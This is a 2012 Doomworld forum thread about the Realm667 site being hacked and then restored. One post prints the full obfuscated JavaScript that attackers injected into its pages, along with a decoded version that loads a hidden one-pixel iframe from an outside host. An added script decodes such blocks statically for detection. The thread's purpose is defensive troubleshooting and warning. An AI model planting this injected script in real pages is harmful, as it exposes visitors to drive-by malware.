Doomworld Forums : Powered by vBulletin version 2.2.5 Doomworld Forums > Classic Doom > Doom General > Something wrong with Realm667.
PRIMEVAL
Senior Member


Posts: 1899
Registered: 03-09



Quasar said:

Too busy shutting down sites that legally comply with DMCA even when not legally required to do so on account of not being incorporated within the US, and then redirecting their domain names to ICE logos to scare up the little people into obeying their masters.



Ah, well, I guess tough luck then.


Old Post 12-03-12 17:41 #
Mancubus II
Purple is not a breakfast color


Posts: 1939
Registered: 02-03



Tormentor667 said:
Depending, I managed to remove the injected code but I am not sure yet where the security hole is... so if you are a good programmer or hacker, feel free to let us know :)

No you haven't, or it's back again. It was picked up by antivirus attempting to visit your page.

You are running phpbb, so you can bet that's where the security hole is. Are you running the latest version? Are your permissions set properly? You may want to consider different forum software.

Old Post 12-03-12 20:34 #
PRIMEVAL
Senior Member


Posts: 1899
Registered: 03-09


Any progress with this? Site is still down it seems.


Old Post 12-07-12 22:01 #
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12



PRIMEVAL said:
Any progress with this?

The last thing I know is that Tormentor hasn't completely got rid of the problem and was (probably still is) in need of some assistance from more experienced individuals to help with the issue.


Site is still down it seems.

The front page is still accessible. As for the forums, I don't know. I visited it yesterday and my anti-virus software reported an unidentified/unknown file being downloaded into my machine from the site. Since then, I refrained from going there.

Old Post 12-08-12 08:10 #
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


Be sure to disable javascript before visiting the forums.

There is an unplugged security hole somewhere that allows whatever hackbot does this to inject this javascript code at random places in the HTML files:


<!--393740--><script type="text/javascript" language="javascript" > ww=window; try{document.body++} catch(dgsgsdg){zxc=1; } try{d=document.createElement("div"); d.innerHTML.a="asd"; } catch(agdsg){zxc=0; } try{if(ww.document)window["doc"+"ument"]["body"]="asd"} catch(bawetawe){if(ww.document){v=window; try{fawbe--} catch(afnwenew){try{(v+v)()} catch(gngrthn){if("".substr)ev=eval; } n=["1f", "42", "4h", "4a", "3o", "4g", "45", "4b", "4a", "17", "1f", "1g", "17", "4n", "d", "a", "17", "17", "17", "17", "4i", "3m", "4e", "17", "4h", "17", "2b", "17", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "3o", "4e", "41", "3m", "4g", "41", "2j", "48", "41", "49", "41", "4a", "4g", "1f", "1e", "45", "42", "4e", "3m", "49", "41", "1e", "1g", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4e", "3o", "17", "2b", "17", "1e", "44", "4g", "4g", "4c", "28", "1m", "1m", "4m", "41", "4e", "4b", "3m", "3o", "4g", "45", "4b", "4a", "1l", "4a", "48", "1m", "4e", "41", "48", "3m", "4l", "1l", "4c", "44", "4c", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "4c", "4b", "4f", "45", "4g", "45", "4b", "4a", "17", "2b", "17", "1e", "3m", "3n", "4f", "4b", "48", "4h", "4g", "41", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "3n", "4b", "4e", "40", "41", "4e", "17", "2b", "17", "1e", "1n", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "44", "41", "45", "43", "44", "4g", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "4j", "45", "40", "4g", "44", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "48", "41", "42", "4g", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "4g", "4b", 
"4c", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29", "d", "a", "d", "a", "17", "17", "17", "17", "45", "42", "17", "1f", "18", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "43", "41", "4g", "2j", "48", "41", "49", "41", "4a", "4g", "2g", "4l", "2n", "40", "1f", "1e", "4h", "1e", "1g", "1g", "17", "4n", "d", "a", "17", "17", "17", "17", "17", "17", "17", "17", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "4j", "4e", "45", "4g", "41", "1f", "1e", "2a", "40", "45", "4i", "17", "45", "40", "2b", "3h", "1e", "4h", "3h", "1e", "17", "2c", "2a", "1m", "40", "45", "4i", "2c", "1e", "1g", "29", "d", "a", "17", "17", "17", "17", "17", "17", "17", "17", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "43", "41", "4g", "2j", "48", "41", "49", "41", "4a", "4g", "2g", "4l", "2n", "40", "1f", "1e", "4h", "1e", "1g", "1l", "3m", "4c", "4c", "41", "4a", "40", "2h", "44", "45", "48", "40", "1f", "4h", "1g", "29", "d", "a", "17", "17", "17", "17", "50", "d", "a", "50", "1g", "1f", "1g", "29"]; h=2; s=""; if(zxc)for(i=0; i-443!=0; i++){k=i; s+=String.fromCharCode(parseInt(n[i], 25)); } z=s; if(ww.document)ev("if(1)"+z)} } } </script><!--/393740-->


(Spaces added to save layout.)

If you de-obfuscate the code, you get this:
code:
(function () {
    // Build an iframe pointing at the third-party host
    var u = document.createElement('iframe');
    u.src = 'http://zeroaction.nl/relay.php';
    // Style it as a borderless 1x1 pixel frame so it is effectively invisible
    u.style.position = 'absolute';
    u.style.border = '0';
    u.style.height = '1px';
    u.style.width = '1px';
    u.style.left = '1px';
    u.style.top = '1px';

    // Insert it only once per page
    if (!document.getElementById('u')) {
        document.write('<div id=\'u\' ></div>');
        document.getElementById('u').appendChild(u);
    }
})();

So adding zeroaction.nl to your .host file as 127.0.0.1 might be a good idea to make sure this hack is thwarted on your PC.

Cleaning it up is useless, since it just comes back a few hours later.

Last edited by Gez on 12-08-12 at 08:34

Old Post 12-08-12 08:13 #
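
The de-obfuscation described in the post above can be done statically, without letting the script call eval. The following is an added example, not part of the original post: it finds script blocks wrapped in paired numeric comment markers, decodes the quoted token array with the radix passed to parseInt, and lists the hosts the decoded text points to. The function names, the marker 111111 and the host blocked.example are constructed for illustration.

```javascript
// Paired numeric comment markers around a script: <!--N--><script>...</script><!--/N-->
const INJECT_RE = /<!--(\d+)-->\s*<script\b[^>]*>([\s\S]*?)<\/script>\s*<!--\/\1-->/gi;

function findInjectedBlocks(html) {
  return [...html.matchAll(INJECT_RE)].map(m => ({ marker: m[1], offset: m.index, body: m[2] }));
}

// Decode n=["1f", "42", ...] using the radix found in parseInt(n[i], RADIX).
// Nothing from the page is executed; the array is treated as data only.
function decodeBody(body) {
  const arr = body.match(/\[\s*((?:"[0-9a-z]{1,3}"\s*,?\s*)+)\]/i);
  const rad = body.match(/parseInt\s*\([^,]+,\s*(\d+)\s*\)/);
  if (!arr || !rad) return null;
  const radix = Number(rad[1]);
  if (radix < 2 || radix > 36) return null;
  let out = "";
  for (const tok of arr[1].match(/[0-9a-z]+/gi)) {
    // Reject tokens containing a digit that is not valid in this radix
    if ([...tok].some(c => Number.isNaN(parseInt(c, radix)))) return null;
    out += String.fromCharCode(parseInt(tok, radix));
  }
  return out;
}

// Hosts referenced by the decoded text (candidates for blocking or log searches)
function extractHosts(text) {
  const hosts = new Set();
  for (const m of text.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

function triage(html) {
  return findInjectedBlocks(html).map(b => {
    const decoded = decodeBody(b.body);
    return { marker: b.marker, offset: b.offset, decoded, hosts: decoded ? extractHosts(decoded) : [] };
  });
}

// Constructed sample: a harmless string encoded the same way (radix 25)
function encode(text, radix) {
  return [...text].map(c => '"' + c.charCodeAt(0).toString(radix) + '"').join(", ");
}
const PLAIN = "u.src = 'http://blocked.example/relay.php';";
const SAMPLE_HTML = '<p>post text</p><!--111111--><script type="text/javascript">n=[' +
  encode(PLAIN, 25) +
  ']; for(i=0;i<n.length;i++){s+=String.fromCharCode(parseInt(n[i], 25));}' +
  '</script><!--/111111--><p>more</p>';

console.log(triage(SAMPLE_HTML));
```

Run over a site's served HTML files, a non-empty result marks pages that still carry an injected block, which is useful for confirming whether a cleanup has held.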
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12


Is disabling JavaScript alone enough, or do I need to do this as well...?

Gez said:
So adding zeroaction.nl to your .host file as 127.0.0.1 might be a good idea to make sure this hack is thwarted on your PC.

And if so, could you run it down as a step-by-step? Because I haven't got a clue on how to do this (I'm referring to the quoted bit above, not the javascript one).

Old Post 12-08-12 13:12 #
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


Disabling JavaScript alone should be sufficient.

The hosts file is, on Windows systems, C:\Windows\System32\Drivers\etc\.hosts.

Old Post 12-08-12 14:52 #
Mancubus II
Purple is not a breakfast color


Posts: 1939
Registered: 02-03



Gez said:
The hosts file is, on Windows systems, C:\Windows\System32\Drivers\etc\hosts

Minus the period before hosts...

Old Post 12-08-12 15:23 #
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12



Gez said:
Disabling JavaScript alone should be sufficient.

Thanks. Now, I just hope this isn't going to be the permanent solution for this.

Old Post 12-08-12 15:49 #
printz
CRAZY DUMB ZEALOT


Posts: 8545
Registered: 06-06


The top of the page (right below the Chrome address bar) seems to show some Chinese characters now:
http://i.imgur.com/MdQIBl.png
Maybe that's the iframe caused by the hack?

__________________
Automatic Wolfenstein - Version 1.0

Old Post 12-08-12 22:04 #
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


Why do you go there with JS enabled?! Don't! And there'll be no iframe!

Old Post 12-08-12 22:19 #
printz
CRAZY DUMB ZEALOT


Posts: 8545
Registered: 06-06


I went there before I read this info. And I hope you're not genuinely bothered, but sorry in any case :-/

Are you being genuinely alarmed (me being a fool who just infected his device, me doing something that makes it difficult for you to fix the site) or sarcastic (I should have known the obvious)?

__________________
Automatic Wolfenstein - Version 1.0

Old Post 12-08-12 22:43 #
GhostlyDeath
Forum Retard


Posts: 1027
Registered: 08-05


Just download everything and check the ZIPs for integrity and viruses.

Old Post 12-09-12 02:12 #
BloodyAcid
Senior Member


Posts: 1279
Registered: 09-11


So...what's going on with the website now? Nothing's working. I hope it's a revamp and not a closure.

Old Post 12-16-12 19:38 #
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


It's the end of days. Fixing the site is pointless since the world will explode in less than a week.

Seriously though, the last news were that a professional was working on fixing the security holes. The message board was also apparently being upgraded.

I'm not aware of anything else.

Old Post 12-16-12 20:24 #
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12



Gez said:
It's the end of days.

I'm inclined to believe that. I've just visited the front page and all there was an inverted cross with "No rest of the living..." phrase at the bottom.

Old Post 12-17-12 00:56 #
GreyGhost
Why don't I have a custom title by now?!


Posts: 8140
Registered: 01-08


Plugging security holes AND upgrading the message boards probably requires the site to be taken offline, apart from that placeholder image.

Old Post 12-17-12 01:26 #
Tormentor667
Senior Member


Posts: 1975
Registered: 10-00



Mancubus II said:
You may want to consider different forum software.

What would you suggest? And beyond, how to migrate the old posts and users?

Old Post 12-17-12 10:08 #
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


Manc uses SMF.

It still uses PHP, though, which I think is ultimately the source of most security holes.

Old Post 12-17-12 10:42 #
Tormentor667
Senior Member


Posts: 1975
Registered: 10-00


Is there an easy way to migrate content from phpBB to SMF?

Old Post 12-17-12 11:25 #
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


I suppose not, but I have no idea.

Old Post 12-17-12 12:12 #
Clonehunter
Forum Spammer


Posts: 3182
Registered: 03-10



Blue Shadow said:

I'm inclined to believe that. I've just visited the front page and all there was an inverted cross with "No rest of the living..." phrase at the bottom.



Granted, it's kinda cool looking.

Old Post 12-19-12 01:43 #
Kappes Buur
Forum Regular


Posts: 798
Registered: 11-02



Tormentor667 said:
What would you suggest? And beyond, how to migrate the old posts and users?

Some commercial and free forum software:
https://www.vbulletin.com/
http://www.simplemachines.org/
http://www.aspplayground.net/
http://www.proboards.com/
http://www.mybb.com/

MyBB has a handy tool to migrate from other forum software.

This site has some helpful hints, reviews and comparisons:
http://www.forum-software.org/

Old Post 12-19-12 15:37 #
MajorRawne
Senior Member


Posts: 1168
Registered: 04-10


I'm getting the attack site message too. It looks similar to the message I get when I insert some of the new Bestiary creatures into my own maps.

WOAH!

Are you sure you want to add that?

<Pallette_swapped_monster_used_as_a_boss> may be risky to fight.

Why are you seeing this message?

This monster reportedly blasts five hundred fireballs out in all directions, has numerous other devastating attacks and sustains more damage than every monster in Doom 2 combined.

< Back to the drawing board Use monster anyway >


Nevertheless, the Bestiary is awesome and I hope this is resolved soon :)

Old Post 12-19-12 17:58 #
djvero
Mini-Member


Posts: 65
Registered: 04-10


What's going on now over there? Does anybody have some information? I only get to see a picture of a tomb stone that says "No rest for the living"

Old Post 12-22-12 14:58 #
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12


The site was hacked early this month, and is now being repaired and upgraded.

As for when that process will be completed, I don't know.

Old Post 12-22-12 16:42 #
djvero
Mini-Member


Posts: 65
Registered: 04-10


Yea I knew it got hacked, but the site was still running and then a few days ago the website was shut down, so I thought they had been hacked again

Old Post 12-24-12 14:47 #
Tormentor667
Senior Member


Posts: 1975
Registered: 10-00



Memfis said:
What if Tormentor himself "hacked" it so that he could boost his ego by reading threads like this one? JK.

You must be the greatest idiot possible on this planet :D

Anyway, we are back online!

Old Post 12-27-12 23:18 #
BloodyAcid
Senior Member


Posts: 1279
Registered: 09-11



Tormentor667 said:

You must be the greatest idiot possible on this planet :D

Anyway, we are back online!


yay welcome back! :D

Old Post 12-27-12 23:36 #
GreyGhost
Why don't I have a custom title by now?!


Posts: 8140
Registered: 01-08



Tormentor667 said:
Anyway, we are back online!

Welcome back! I'm leaving a page open to see how high the snow gets.

Old Post 12-28-12 04:16 #